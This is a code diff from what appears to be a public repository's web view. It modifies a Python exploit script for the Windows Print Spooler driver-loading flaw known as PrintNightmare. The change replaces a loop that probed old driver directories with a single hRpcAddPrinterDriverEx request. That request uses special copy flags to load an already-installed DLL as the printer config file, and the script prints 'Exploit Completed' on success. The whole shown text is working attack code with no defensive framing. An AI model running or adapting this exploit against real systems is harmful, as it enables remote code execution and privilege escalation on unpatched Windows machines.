|
|
|
|
@ -84,18 +84,14 @@ def main(dce, pDriverPath, share, handle=NULL): |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage0: {0}".format(resp['ErrorCode'])) |
|
|
|
|
|
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" |
|
|
|
|
for i in range(1, 30): |
|
|
|
|
try: |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode'])) |
|
|
|
|
if (resp['ErrorCode'] == 0): |
|
|
|
|
print("[+] Exploit Completed") |
|
|
|
|
sys.exit() |
|
|
|
|
except Exception as e: |
|
|
|
|
#print(e) |
|
|
|
|
pass |
|
|
|
|
# Just ask for a new driver with already installed files |
|
|
|
|
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename) |
|
|
|
|
flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000 |
|
|
|
|
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) |
|
|
|
|
|
|
|
|
|
print("[*] Stage1: {0}".format(resp['ErrorCode'])) |
|
|
|
|
if (resp['ErrorCode'] == 0): |
|
|
|
|
print("[+] Exploit Completed") |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
if __name__ == '__main__': |
|
|
|
|
|
citronneur
3 years ago